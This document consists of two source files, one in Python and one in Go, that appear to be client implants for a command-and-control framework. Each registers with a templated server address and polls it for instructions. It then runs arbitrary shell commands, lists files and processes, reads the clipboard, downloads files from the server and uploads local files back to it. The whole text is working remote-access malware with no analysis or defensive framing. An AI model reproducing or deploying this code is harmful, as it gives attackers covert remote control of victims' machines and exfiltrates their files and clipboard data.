File: client/python/http_client.py
import requests
import time
import uuid
import os
import subprocess
import pyperclip

ip = "{{ip}}"
port = "{{port}}"
server_url = "http://"+ip+":"+port+"/client"
server_url = "http://127.0.0.1:8080/client"
client_uuid = str(uuid.uuid4())

print(client_uuid)
try:
    response = requests.post(server_url, headers={"UUID": client_uuid})
    print("Register Response:", response.text)
except requests.RequestException as e:
    print("Failed to register with server:", e)

def list_files():
    try:
        files = os.listdir('.')
        result = "\n".join(files)
        return result
    except Exception as e:
        return "Error listing files: " + str(e)

def get_clipboard():
    try:
        clipboard_content = pyperclip.paste()
        return clipboard_content
    except Exception as e:
        return "Error getting clipboard content: " + str(e)
    
def download_file(file_path, server_url,save_path):
    url = f"{server_url}/download?filename={file_path}"
    try:
        print(url)
        response = requests.get(url, stream=True,headers={"UUID": client_uuid})
        if response.status_code == 200:
            with open(save_path, 'wb') as f:
                for chunk in response.iter_content(chunk_size=8192):
                    f.write(chunk)
            result = f"File downloaded successfully: {save_path}"
        else:
            result = f"Failed to download file. Status: {response.status_code}, Response: {response.text}"
    except Exception as e:
        result = f"Error downloading file: {e}"
    return result
    
def upload_file(file_path, server_url):
    if not os.path.exists(file_path):
        print(f"Error: The file '{file_path}' does not exist.")
        return
    
    url = f"{server_url}/upload"
    try:
        with open(file_path, 'rb') as file:
            files = {'file': file}
            print(url)
            response = requests.post(url, files=files,headers={"UUID": client_uuid})
            
            if response.status_code == 200:
                result = "File uploaded successfully."
            else:
                result = f"Failed to upload file. Status: {response.status_code}, Response: {response.text}"
    except Exception as e:
        result = f"Error uploading file: {e}"
    return result

def execute_command(command):
    try:
        output = subprocess.check_output(command, shell=True, text=True)
        return output
    except subprocess.CalledProcessError as e:
        return f"Error executing command: " + str(e)

def list_processes():
    try:
        output = subprocess.check_output("ps -aux", shell=True, text=True)
        return output
    except Exception as e:
        return "Error listing processes: " + str(e)

def handle_command(command):
    try:
        if command == "list_files":
            result = list_files()
        elif command == "get_clipboard":
            result = get_clipboard()
        elif command.startswith("download_file "):
            upload_path = command.split(" ", 1)[1]
            save_path = os.path.basename(upload_path)
            result = download_file(upload_path, server_url, save_path)
        elif command.startswith("upload_file "):
            result = upload_file(command.split(" ", 1)[1], server_url)
        elif command.startswith("execute_command "):
            result = execute_command(command.split(" ", 1)[1])
        elif command == "list_processes":
            result = list_processes()
        else:
            result = "Unknown command"
    except Exception as e:
        return {"status": "error", "message": str(e)}
    return result

while True:
    try:
        response = requests.get(server_url, headers={"UUID": client_uuid}, timeout=30)
        server_data = response.json()
        print("Server Response:", server_data)

        if "command" in server_data:
            command = server_data["command"]
            result = handle_command(command)
            print("Command Result:", result)
            requests.post(server_url, headers={"UUID": client_uuid}, json={"command": command,"result": result})
    except requests.ConnectionError as e:
        print("Connection error, retrying in 30 seconds:", e)
        time.sleep(30)
    except requests.RequestException as e:
        print("Request error:", e)
    except Exception as e:
        print("Unexpected error:", e)
    time.sleep(5)

File: client/go/http_client.go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"io"
	"io/ioutil"
	"mime/multipart"
	"net/http"
	"os"
	"os/exec"
	"path/filepath"
	"strings"
	"time"

	"github.com/atotto/clipboard"
	"github.com/google/uuid"
)

const (
	ip         = "{ip}"
	port       = "{port}"
	serverURL  = "http://" + ip + ":" + port + "/client"
	timeout    = 30 * time.Second
	retryDelay = 300 * time.Second
)

var clientUUID = uuid.New().String()

func main() {
	fmt.Println("Client UUID:", clientUUID)

	err := registerClient()
	if err != nil {
		fmt.Println("Failed to register with server:", err)
		return
	}

	retryCount := 0
	maxRetry := 10
	for {
		err := pollServer()
		if err != nil {
			fmt.Println("Error polling server:", err)
			retryCount++
			if retryCount > maxRetry {
				fmt.Println("Max retries reached. Re-registering client...")
				retryCount = 0
				registerClient()
			}
			time.Sleep(retryDelay)
		} else {
			retryCount = 0
		}
	}
}

func registerClient() error {
	req, err := http.NewRequest("POST", serverURL, nil)
	if err != nil {
		return err
	}
	req.Header.Set("UUID", clientUUID)

	client := &http.Client{}
	resp, err := client.Do(req)
	if err != nil {
		return fmt.Errorf("failed to register: %v", err)
	}
	defer resp.Body.Close()

	if resp.StatusCode != http.StatusOK {
		body, _ := ioutil.ReadAll(resp.Body)
		return fmt.Errorf("failed to register with server: %d - %s", resp.StatusCode, string(body))
	}

	body, _ := ioutil.ReadAll(resp.Body)
	fmt.Println("Register Response:", string(body))
	return nil
}

func pollServer() error {
	client := &http.Client{Timeout: timeout}
	req, err := http.NewRequest("GET", serverURL, nil)
	if err != nil {
		return err
	}
	req.Header.Set("UUID", clientUUID)

	resp, err := client.Do(req)
	if err != nil {
		if strings.Contains(err.Error(), "context deadline exceeded") {
			fmt.Println("Request timeout, re-registering client...")
			return registerClient()
		}
		return err
	}
	defer resp.Body.Close()

	if resp.StatusCode != http.StatusOK {
		if resp.StatusCode == http.StatusConflict {
			fmt.Println("UUID is not in sync, re-registering client...")
			return registerClient()
		}
		body, _ := ioutil.ReadAll(resp.Body)
		return fmt.Errorf("server error: %d - %s", resp.StatusCode, string(body))
	}

	var serverData map[string]string
	err = json.NewDecoder(resp.Body).Decode(&serverData)
	if err != nil {
		return fmt.Errorf("failed to decode server response: %v", err)
	}

	fmt.Println("Server Response:", serverData)

	if command, ok := serverData["command"]; ok {
		result := handleCommand(command)
		fmt.Println("Command Result:", result)
		return sendResult(command, result)
	}
	return nil
}

func sendResult(command, result string) error {
	client := &http.Client{}
	data := map[string]string{
		"command": command,
		"result":  result,
	}
	jsonData, _ := json.Marshal(data)

	req, err := http.NewRequest("POST", serverURL, bytes.NewBuffer(jsonData))
	if err != nil {
		return err
	}
	req.Header.Set("UUID", clientUUID)
	req.Header.Set("Content-Type", "application/json")

	resp, err := client.Do(req)
	if err != nil {
		return err
	}
	defer resp.Body.Close()

	return nil
}

func handleCommand(command string) string {
	switch {
	case command == "list_files":
		return listFiles()
	case command == "get_clipboard":
		return getClipboard()
	case strings.HasPrefix(command, "download_file "):
		parts := strings.SplitN(command, " ", 2)
		if len(parts) < 2 {
			return "Invalid download_file command"
		}
		return downloadFile(parts[1])
	case strings.HasPrefix(command, "upload_file "):
		parts := strings.SplitN(command, " ", 2)
		if len(parts) < 2 {
			return "Invalid upload_file command"
		}
		return uploadFile(parts[1])
	case strings.HasPrefix(command, "execute_command "):
		parts := strings.SplitN(command, " ", 2)
		if len(parts) < 2 {
			return "Invalid execute_command command"
		}
		return executeCommand(parts[1])
	case command == "list_processes":
		return listProcesses()
	default:
		return "Unknown command"
	}
}

func listFiles() string {
	files, err := ioutil.ReadDir(".")
	if err != nil {
		return "Error listing files: " + err.Error()
	}

	var fileNames []string
	for _, file := range files {
		fileNames = append(fileNames, file.Name())
	}
	return strings.Join(fileNames, "\n")
}

func getClipboard() string {
	content, err := clipboard.ReadAll()
	if err != nil {
		return "Error getting clipboard content: " + err.Error()
	}
	return content
}

func downloadFile(filePath string) string {
	url := fmt.Sprintf("%s/download?filename=%s", serverURL, filePath)
	resp, err := http.Get(url)
	if err != nil {
		return "Error downloading file: " + err.Error()
	}
	defer resp.Body.Close()

	if resp.StatusCode != http.StatusOK {
		body, _ := ioutil.ReadAll(resp.Body)
		return fmt.Sprintf("Failed to download file. Status: %d, Response: %s", resp.StatusCode, string(body))
	}

	savePath := filepath.Base(filePath)
	out, err := os.Create(savePath)
	if err != nil {
		return "Error creating file: " + err.Error()
	}
	defer out.Close()

	_, err = io.Copy(out, resp.Body)
	if err != nil {
		return "Error saving file: " + err.Error()
	}

	return fmt.Sprintf("File downloaded successfully: %s", savePath)
}

func uploadFile(filePath string) string {
	if _, err := os.Stat(filePath); os.IsNotExist(err) {
		return fmt.Sprintf("Error: The file '%s' does not exist.", filePath)
	}

	url := serverURL + "/upload"

	file, err := os.Open(filePath)
	if err != nil {
		return "Error opening file: " + err.Error()
	}
	defer file.Close()

	body := &bytes.Buffer{}
	writer := multipart.NewWriter(body)

	part, err := writer.CreateFormFile("file", filePath)
	if err != nil {
		return "Error creating form file: " + err.Error()
	}

	if _, err := io.Copy(part, file); err != nil {
		return "Error copying file content: " + err.Error()
	}

	if err := writer.Close(); err != nil {
		return "Error closing writer: " + err.Error()
	}

	req, err := http.NewRequest("POST", url, body)
	if err != nil {
		return "Error creating request: " + err.Error()
	}

	req.Header.Set("UUID", clientUUID)
	req.Header.Set("Content-Type", writer.FormDataContentType())

	client := &http.Client{}
	resp, err := client.Do(req)
	if err != nil {
		return "Error uploading file: " + err.Error()
	}
	defer resp.Body.Close()

	if resp.StatusCode == http.StatusOK {
		return "File uploaded successfully."
	}

	respBody, _ := io.ReadAll(resp.Body)
	return fmt.Sprintf("Failed to upload file. Status: %d, Response: %s", resp.StatusCode, string(respBody))
}

func executeCommand(command string) string {
	out, err := exec.Command("sh", "-c", command).Output()
	if err != nil {
		return "Error executing command: " + err.Error()
	}
	return string(out)
}

func listProcesses() string {
	out, err := exec.Command("ps", "-aux").Output()
	if err != nil {
		return "Error listing processes: " + err.Error()
	}
	return string(out)
}
